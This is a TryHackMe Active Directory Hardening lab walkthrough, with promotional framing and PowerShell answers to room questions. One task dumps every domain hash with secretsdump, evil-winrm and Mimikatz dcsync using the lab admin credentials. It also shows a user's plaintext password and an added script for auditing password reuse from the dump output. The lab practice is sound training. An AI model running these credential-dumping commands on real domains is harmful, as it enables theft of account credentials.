TL;DR TryHackMe is running a promotion for the new Security Engineer pathway! Refer a friend, complete rooms, write one of these walkthroughs, etc. for a chance to win stuff! Also, here’s a walkthrough of the AD Hardening room.
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
Run, don’t walk, to the new TryHackMe Security Engineer pathway. Complete rooms, refer a friend, do a writeup, let your company know about TryHackMe training, and you, yes you could win some great stuff like a free year of TryHackMe or a laptop.
Here at test.local we had the day off so we immediately knocked out the Active Directory Hardening room in the pathway.
The room is very basic and introductory, but it’s a great start. It seeks to educate regarding basic security hygiene such as
- Requiring SMB & LDAP signing
- Requiring password length
- Least privilege
- Privilege tiers
- Compliance with baselines
- Protecting against common attacks such as Kerberoasting
The room left out a few things that should be done in most Windows domain environments:
- Disabling LLMNR & NetBIOS
- Configuring LAPS on any workstation OUs
- Using the Protected Users group
- Disabling delegation on privileged user accounts
- Considering smartcards [they can be expensive, but they’re cheaper than a breach]
The room did however list other TryHackMe rooms that cover much of the above.
Well that’s enough theory, let’s put our hands on the keyboard, connect to the VM, and start finding some answers.
xfreerdp /v:10.10.66.5 /u:Administrator /p:tryhackmewouldnotguess1@ /dynamic-resolution
— Task 2 —
What is the root domain in the attached AD machine?
Get-ADDomain
Or if you want just the answer
(Get-ADDomain).DNSRoot
tryhackme.loc
— Task 3 —
What is the default minimum password length (number of characters) in the attached VM?
Get-ADDefaultDomainPasswordPolicy
Or if you want just the answer
(Get-ADDefaultDomainPasswordPolicy).MinPasswordLength
7
— Task 5 —
Find and open BaselineLocalInstall script in PowerShell editor — Can you find the flag?
Get-Content (Get-ChildItem -Path "C:\Users\Administrator\Desktop\Scripts" -Include "*BaselineLocalInstall*" -File -Recurse -ErrorAction SilentlyContinue).PSPath | Select-String "THM{"
THM{00001}
Find and open MergePolicyRule script (Policy Analyser) in PowerShell editor — Can you find the flag?
I couldn’t find the “MergePolicyRule.ps1”. I think it was supposed to be “Merge-PolicyRule.ps1”.
Get-Content (Get-ChildItem -Path "C:\Users\Administrator\Desktop\Scripts" -Include "*.ps1" -File -Recurse -ErrorAction SilentlyContinue).PSPath | Select-String "{*}"
{THM00191}
Alt:
Get-Content (Get-ChildItem -Path "C:\Users\Administrator\Desktop\Scripts" -Include "*.ps1" -File -Recurse -ErrorAction SilentlyContinue).PSPath | Select-String "Flag :"
— Task 6 —
As per the generated report, how many users have the same password as aaron.booth?
Initially I just ran secretsdump from Kali since after all we already have a Domain Admin login.
cd /home/kali/Downloads/impacket-master/examples
python3 secretsdump.py -just-dc-ntlm za/Administrator@10.10.66.5
However this is not a good way to get a count of matching NTLM hashes. Therefore I copied Invoke-Mimikatz.ps1 to the VM and ran it there. This can be done via evil-winrm. (Our Mimikatz cheatsheet is here if you are not familiar with it.)
evil-winrm -i 10.10.66.3 -u Administrator -p tryhackmewouldnotguess1@
upload /home/kali/Downloads/exploits/PowerShell/Invoke-Mimikatz.ps1
Or one can just copy/paste it over RDP.
Dump all the hashes to a file.
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:za.tryhackme.loc /all"' | Out-File .\AllCreds.txt
Find aaron.booth’s NTLM.
Get-Content .\AllCreds.txt | Select-String aaron.booth -Context 5
Copy/paste aaron.booth’s hash and get a count of total matches.
(Get-Content .\AllCreds.txt | Select-String "64f12cddaa88057e06a81b54e73b949b").Count
Just subtract 1, since aaron.booth is one of the matches.
186
By the way, there were 5,046 AD users on the VM, so running quick queries like the above is a good, workable way to get a count quickly and easily.
In case anyone else is curious, aaron.booth’s plaintext password is Password1.
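As an added example (not part of the original walkthrough), here is a small Python script that gets the same count straight from secretsdump's `domain\user:rid:lmhash:nthash:::` output, the step the post found awkward, and also lists every hash shared by more than one user, which is the password-reuse audit a hardening effort actually wants. The dump lines and hashes below are constructed placeholders, not data from the room.

```python
import re
from collections import defaultdict

# Constructed sample in secretsdump -just-dc-ntlm output format; the hashes are
# placeholders, not real credential material.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
za.tryhackme.loc\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
za.tryhackme.loc\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
za.tryhackme.loc\\aaron.booth:1105:aad3b435b51404eeaad3b435b51404ee:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
za.tryhackme.loc\\bob.smith:1106:aad3b435b51404eeaad3b435b51404ee:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
za.tryhackme.loc\\carol.jones:1107:aad3b435b51404eeaad3b435b51404ee:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
za.tryhackme.loc\\dave.lee:1108:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
THMDC$:1000:aad3b435b51404eeaad3b435b51404ee:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:::
[*] Cleaning up...
"""

# One credential record: optional DOMAIN\ prefix, user, RID, LM hash, NT hash, ':::'.
RECORD_RE = re.compile(
    r'^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^\\:]+):(?P<rid>\d+)'
    r':(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::', re.IGNORECASE)

def parse_dump(text, include_machine_accounts=False):
    """Group account names by NT hash; status lines and anything else are skipped."""
    by_hash = defaultdict(list)
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if not m:
            continue
        user = m.group('user')
        # Machine accounts ($) have random, auto-rotated passwords, so a shared
        # hash there is not human password reuse; leave them out by default.
        if user.endswith('$') and not include_machine_accounts:
            continue
        by_hash[m.group('nt').lower()].append(user)
    return by_hash

def others_sharing_password(text, account):
    """How many other accounts have the same NT hash as `account` (the room's question)."""
    for users in parse_dump(text).values():
        if account.lower() in (u.lower() for u in users):
            return len(users) - 1  # the account itself is one of the matches
    raise KeyError(f'{account} not found in dump')

def reuse_report(text, min_accounts=2):
    """All hashes shared by at least `min_accounts` users, most widely shared first."""
    groups = [(nt, sorted(users)) for nt, users in parse_dump(text).items()
              if len(users) >= min_accounts]
    return sorted(groups, key=lambda g: (-len(g[1]), g[0]))
```

Point `parse_dump` at the saved secretsdump output and `reuse_report` gives you every shared-password group in one pass, which is a far more useful artefact for a remediation ticket than a single count.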
Summary
I’m always happy to see TryHackMe roll out a new pathway. This one looks promising and a good way to keep getting hands-on practice and learning.
References
NTLM: https://learn.microsoft.com/en-us/windows/win32/secauthn/microsoft-ntlm
Dumping all domain hashes with Mimikatz: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/